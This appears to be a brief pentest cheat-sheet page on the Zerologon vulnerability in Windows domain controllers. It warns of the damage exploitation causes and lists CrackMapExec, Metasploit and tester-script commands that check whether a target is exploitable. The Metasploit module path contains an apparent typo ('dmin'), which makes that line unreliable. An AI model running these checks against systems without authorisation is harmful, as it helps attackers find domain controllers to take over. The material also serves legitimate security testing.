Last updated 2 years ago
Zerologon (CVE-2020-1472) should only be exploited if you are aware of the consequences. Exploitation will result in the domain controller machine password being changed and will break domain replication if not restored to the original setting.
# Checking exploitability CrackMapExec crackmapexec $ip smb -u $username -p $password -M zerologon # Checking exploitability with Metasploit use auxiliary/dmin/dcerpc/cve_2020_1472_zerologon set rhosts $ip check # https://github.com/SecuraBV/CVE-2020-1472 ./zerologon_tester.py $dcnetbiosname $ip
